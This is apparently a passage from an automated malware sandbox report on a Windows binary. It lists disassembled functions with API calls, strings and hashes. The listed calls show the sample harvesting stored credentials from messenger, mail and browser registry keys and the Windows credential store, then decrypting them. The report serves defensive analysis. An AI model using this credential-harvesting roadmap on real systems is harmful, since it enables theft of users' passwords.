        • Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A
        Function 004088D4 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
        • String ID: 0$6
        • API String ID: 3540791495-3849865405
        • Opcode ID: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
        • Instruction ID: a8fe6fb1212bd118e16e367106d6d34f7a286138b6ca25e595fdc587e8241262
        • Opcode Fuzzy Hash: 279e0e3116dd7a36083eff5afaa6bfe1abce752894615ec7df7e32fa7ef46b8e
        • Instruction Fuzzy Hash: 0C31BFB2408380AFC7209F55D941AABBBE8EB84314F04483FF588A2251D778D984CF5A
        Function 0040C1E0 Relevance: 15.1, APIs: 10, Instructions: 133windowCOMMON
        Download Yara Rule
        APIs
        • SetBkMode.GDI32(?,00000001), ref: 0040C259
        • SetTextColor.GDI32(?,00FF0000), ref: 0040C267
        • SelectObject.GDI32(?,?), ref: 0040C27C
        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C2B1
        • SelectObject.GDI32(00000014,?), ref: 0040C2BD
          • Part of subcall function 0040C01D: GetCursorPos.USER32(?), ref: 0040C02A
          • Part of subcall function 0040C01D: GetSubMenu.USER32(?,00000000), ref: 0040C038
          • Part of subcall function 0040C01D: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C066
        • LoadCursorA.USER32(00000067), ref: 0040C2DE
        • SetCursor.USER32(00000000), ref: 0040C2E5
        • SetFocus.USER32(?), ref: 0040C33A
        • SetFocus.USER32(?), ref: 0040C394
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadModePopupTrack
        • String ID:
        • API String ID: 4166086388-0
        • Opcode ID: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
        • Instruction ID: ca719c1047b4580995a570777fd11ce3246ad295cd7033b7258bae339062b572
        • Opcode Fuzzy Hash: 0f428dd74f7ae692e61f7adedafcb516b73031be7699d21d2f2f5f012eb25ada
        • Instruction Fuzzy Hash: B341A131110604EBCB119F64C8C9BEF7BA5FB44710F11C23AF916A62E1C739A9519B9E
        Function 004037A2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193stringCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@$strlen
        • String ID:
        • API String ID: 4288758904-3916222277
        • Opcode ID: 9c9cc1151678b2697f8a7d88cf9cff7bd28171a94cb424ec11849ca71a27f27f
        • Instruction ID: d333ae2b58ca57a5e95d27ff611bbcc91c556c8a5badbdc87924e9ab9e00570b
        • Opcode Fuzzy Hash: 9c9cc1151678b2697f8a7d88cf9cff7bd28171a94cb424ec11849ca71a27f27f
        • Instruction Fuzzy Hash: 15616AB1C0461ADADF20AFA5D4854EEBFB8FB05306F2084BFE151B2281C7794B428B49
        Function 0040FE5D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 99registryCOMMON
        Download Yara Rule
        APIs
        • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,75B4EC10,00000000), ref: 0040FE8C
        • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040FF56
          • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
          • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        • memcpy.MSVCRT ref: 0040FEFE
        • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040FF0A
        • RegCloseKey.ADVAPI32(?), ref: 0040FF79
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpy
        • String ID: $Password.NET Messenger Service$User.NET Messenger Service
        • API String ID: 2372935584-105384665
        • Opcode ID: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
        • Instruction ID: 9eae1372b2d93665619faee8fa876547b7665fb4356df5418aeb828a8df32af1
        • Opcode Fuzzy Hash: 0efffbcd1b8067ca95f35c9c097a34e3d5fc4d975f38032de2900e02614f1ca4
        • Instruction Fuzzy Hash: AD314FB2D00219AFDB11DF95D880ADEBBB8FF49344F004077F515B3251D7389A499B98
        Function 00404D7A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
        Download Yara Rule
        APIs
        • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
        • FreeLibrary.KERNEL32(00000000), ref: 00404DBF
        • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Library$AddressFreeLoadMessageProc
        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
        • API String ID: 2780580303-317687271
        • Opcode ID: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
        • Instruction ID: eec6f3f66ef6417fb43289990c32370c6d67362bb519490399a3c202bd773795
        • Opcode Fuzzy Hash: 0271221c947319f8f9baa3460b985664642af3c5e03074db1750b5e73f8f99f3
        • Instruction Fuzzy Hash: 6701D671751615ABD3215BA09C49BEB3EA8DFC9749B118139E206F2180DFB8CA09829C
        Function 00406735 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
        Download Yara Rule
        APIs
        • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 0040675A
        • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406778
        • strlen.MSVCRT ref: 00406785
        • _mbscpy.MSVCRT ref: 00406795
        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040679F
        • _mbscpy.MSVCRT ref: 004067AF
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
        • String ID: Unknown Error$netmsg.dll
        • API String ID: 2881943006-572158859
        • Opcode ID: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
        • Instruction ID: dfc2e55caf94d9be92a05a02ea8e3c4f3bcfe7ce6760d4d77d664b9d120d38b6
        • Opcode Fuzzy Hash: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
        • Instruction Fuzzy Hash: F1014731600210BBDB152B60FD46EDF7F2CDF44B95F20403AF602B6090DA385E50C69C
        Function 00404109 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35libraryloaderCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,75B4EC10), ref: 00404177
        • LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,75B4EC10,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
        • GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
        • GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$Library$FreeLoad
        • String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
        • API String ID: 2449869053-331516685
        • Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
        • Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
        • Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
        • Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58
        Function 0040955A Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
        • ??2@YAPAXI@Z.MSVCRT ref: 00409591
        • ??2@YAPAXI@Z.MSVCRT ref: 004095AD
        • memcpy.MSVCRT ref: 004095D5
        • memcpy.MSVCRT ref: 004095F2
        • ??2@YAPAXI@Z.MSVCRT ref: 0040967B
        • ??2@YAPAXI@Z.MSVCRT ref: 00409685
        • ??2@YAPAXI@Z.MSVCRT ref: 004096BD
          • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
          • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
          • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
          • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
        • String ID: $$d
        • API String ID: 2915808112-2066904009
        • Opcode ID: 6f5aac561b5649608c0d5148fdd10fc31cb827f7443ab44f776165d2fa363ad4
        • Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
        • Opcode Fuzzy Hash: 6f5aac561b5649608c0d5148fdd10fc31cb827f7443ab44f776165d2fa363ad4
        • Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44
        Function 004134D0 Relevance: 13.6, APIs: 9, Instructions: 61windowCOMMON
        Download Yara Rule
        APIs
        • GetParent.USER32(00000000), ref: 004134D2
        • GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
        • GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
        • GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
        • GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
        • GetWindowRect.USER32(00000000,?), ref: 0041351F
        • CopyRect.USER32(?,?), ref: 00413533
        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
        • SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
        • String ID:
        • API String ID: 2317770421-0
        • Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
        • Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
        • Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
        • Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4
        Function 0041244B Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpy
        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
        • API String ID: 3510742995-3273207271
        • Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
        • Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
        • Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
        • Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF
        Function 00410205 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 004102AA
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,75B4EC10,00000000), ref: 004102C3
        • _strnicmp.MSVCRT ref: 004102DF
        • WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,75B4EC10,00000000), ref: 0041030D
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,75B4EC10,00000000), ref: 0041032C
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ByteCharMultiWide$_strnicmpmemset
        • String ID: WindowsLive:name=*$windowslive:name=
        • API String ID: 2393399448-3589380929
        • Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
        • Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
        • Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
        • Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8
        Function 0040821A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
          • Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
          • Part of subcall function 0040746B: ??3@YAXPAX@Z.MSVCRT ref: 00407478
        • memset.MSVCRT ref: 00408286
        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 004082AF
        • _strupr.MSVCRT ref: 004082CD
          • Part of subcall function 00407364: strlen.MSVCRT ref: 00407375
          • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 00407398
          • Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 004073BB
          • Part of subcall function 00407364: memcpy.MSVCRT ref: 004073DB
        • memset.MSVCRT ref: 00408313
        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 0040833E
        • RegCloseKey.ADVAPI32(?), ref: 0040834F
        Strings
        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00408237
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@$EnumValuememset$CloseOpen_struprmemcpystrlen
        • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
        • API String ID: 373939914-680441574
        • Opcode ID: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
        • Instruction ID: e14454ebfdff30ad66f99699cc9b695ae8a68f87cdcb03d8fe41683d15f76d0b
        • Opcode Fuzzy Hash: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
        • Instruction Fuzzy Hash: 5141EDB2D0011DAFDB11DF99DC829DEBBBCAF14304F10406ABA05F2151E634AB45CB95
        Function 0040260A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93registryCOMMON
        Download Yara Rule
        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,Software\America Online\AIM6\Passwords,00000000,00020019,?), ref: 00402638
        • memset.MSVCRT ref: 0040265A
        • memset.MSVCRT ref: 00402676
        • wcscpy.MSVCRT ref: 004026BD
        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,?), ref: 0040271B
        • RegCloseKey.ADVAPI32(?), ref: 00402724
        Strings
        • Software\America Online\AIM6\Passwords, xrefs: 0040262E
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$CloseEnumOpenValuewcscpy
        • String ID: Software\America Online\AIM6\Passwords
        • API String ID: 295685061-818317896
        • Opcode ID: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
        • Instruction ID: 88eb4c74892045a3a61c352dacbb2536a85d96596cfce7057c4216d26753dbed
        • Opcode Fuzzy Hash: a6e0e670a062fae4d46a71794003c79dd6e3f5cc49125a91a21113afdc381c0b
        • Instruction Fuzzy Hash: F5311AB284011DAACB10DF91DC45EEFBBBCEF08344F1040A6A609F2180E77497998FA9
        Function 00407A93 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93registryCOMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00407AB4
        • RegQueryValueExA.ADVAPI32(?,POP3_credentials,00000000,?,?,?), ref: 00407AF3
          • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
          • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FD,00000000,00000000,?,00000000,?), ref: 00407B57
        • LocalFree.KERNEL32(?), ref: 00407B67
          • Part of subcall function 00411D82: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
          • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
          • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrlen
        • String ID: POP3_credentials$POP3_host$POP3_name
        • API String ID: 2752996003-2190619648
        • Opcode ID: cec00202e2846724d0b0b46026d070755af8ff0a54eef50ead682826a2db23de
        • Instruction ID: 3c80738b82331245788ee24e24f692cafec0a237d8f87c7d6b462bdafe46d179
        • Opcode Fuzzy Hash: cec00202e2846724d0b0b46026d070755af8ff0a54eef50ead682826a2db23de
        • Instruction Fuzzy Hash: 9F312DB190121DAFDB11DF99DD81AEEBBBCEF48304F4040AAE955B3251D634AF448BA4
        Function 00410F07 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • memset.MSVCRT ref: 00410F48
          • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
        • memset.MSVCRT ref: 00410F92
        • RegCloseKey.ADVAPI32(?), ref: 00410FF6
        • RegCloseKey.ADVAPI32(?), ref: 0041101F
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Closememset$EnumOpen
        • String ID: Software\Paltalk$nickname$pwd
        • API String ID: 1938129365-1014362899
        • Opcode ID: c23878bb76d00e9547f06f5eb81a13c4f10b53ad90653c278c10a550e2a960fe
        • Instruction ID: 96d414647358d9b2c810da9b3bce946d65dcecd18022e5434843d59e9988e6f9
        • Opcode Fuzzy Hash: c23878bb76d00e9547f06f5eb81a13c4f10b53ad90653c278c10a550e2a960fe
        • Instruction Fuzzy Hash: 7B3164B1D4011DAFDF11AB95DD42BEE7B7DAF18304F0000A6F604A2111D7399F95CB65
        Function 004044DE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59libraryloaderCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0
        • FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
          • Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94
        • GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
        • GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
        • CloseHandle.KERNEL32(?), ref: 00404553
        • CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$CloseHandleLibrary$FreeLoad
        • String ID: DuplicateToken$SetThreadToken
        • API String ID: 3357505703-785560009
        • Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
        • Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
        • Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
        • Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68
        Function 00408FBC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
        • _mbscpy.MSVCRT ref: 00408FD6
        • _mbscpy.MSVCRT ref: 00408FE6
        • GetPrivateProfileIntA.KERNEL32(0041E308,rtl,00000000,0041E200), ref: 00408FF7
        • GetPrivateProfileStringA.KERNEL32(0041E308,charset,00417C88,0041E350,0000003F,0041E200), ref: 00409022
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: PrivateProfile_mbscpy$AttributesFileString
        • String ID: charset$general$rtl
        • API String ID: 888011440-3784062100
        • Opcode ID: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
        • Instruction ID: ef4fb33988e1ec7767552a7ed3f3ae2affcfc9826048e3bb16e6b0e4c8ee98e3
        • Opcode Fuzzy Hash: 55f41d98300eda273b6a0d0ace1f1b61fb276ed63f1592d27e33da27b08274f9
        • Instruction Fuzzy Hash: 2CF0B43568020879E3111712AC0AFFB6E68EB86F11F18843FBC14921D1D67D494185AD
        Function 00405865 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 202stringCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$strlen
        • String ID: '$'$S'password'$S'username'
        • API String ID: 3337090206-859024053
        • Opcode ID: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
        • Instruction ID: 095c589e2a809376e97825867b0f887a5e853f6b8f709b3ead32f3d6acc6b9c2
        • Opcode Fuzzy Hash: e1cab7f00341b9ec69ea1fd77629a3ef37b3dcc5a417ad93794562d5d2f9417f
        • Instruction Fuzzy Hash: A5716071D0065DAECF21DB94C881BEFBBB4EF1A314F5041ABD444B7282D6385A8A8F59
        Function 0040AC28 Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
        Download Yara Rule
        APIs
        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040AC75
        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040ACAA
        • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040ACDF
        • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040ACFB
        • GetSysColor.USER32(0000000F), ref: 0040AD0B
        • DeleteObject.GDI32(?), ref: 0040AD3F
        • DeleteObject.GDI32(00000000), ref: 0040AD42
        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040AD60
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: MessageSend$DeleteImageLoadObject$Color
        • String ID:
        • API String ID: 3642520215-0
        • Opcode ID: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
        • Instruction ID: 10adafa9a034a25fdfd439dfbbefb27d9cbe3ef8874ff0eb0b967345faf6b271
        • Opcode Fuzzy Hash: 89608fa394cce56546426f1758b6b0ed6a96b027106975741db31758971510ff
        • Instruction Fuzzy Hash: B8316171680708BFFA316B60DC47FD67695EB88B00F104829F3857A1E1CAF278909B58
        Function 0040D1D6 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 77COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _strcmpi
        • String ID: account$name$password$protocol
        • API String ID: 1439213657-933060687
        • Opcode ID: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
        • Instruction ID: 794633c49b8c9c94e8125cdebcfe219ffcc263fe4270280c1a3d0952be7122e7
        • Opcode Fuzzy Hash: 9f4445d43ae643b9a2fe9e2fdb03cf84892fe8e67e04b4e06ad1d96e1e33e757
        • Instruction Fuzzy Hash: EA2130B2608702ADE718DE7598407D6F7D4BF05715F20022FE66CD2180FB39A554CB9D
        Function 0040B3FF Relevance: 12.1, APIs: 8, Instructions: 76COMMON
        Download Yara Rule
        APIs
        • GetClientRect.USER32(?,?), ref: 0040B41E
        • GetWindowRect.USER32(?,?), ref: 0040B434
        • GetWindowRect.USER32(?,?), ref: 0040B447
        • BeginDeferWindowPos.USER32(00000003), ref: 0040B464
        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040B481
        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040B4A1
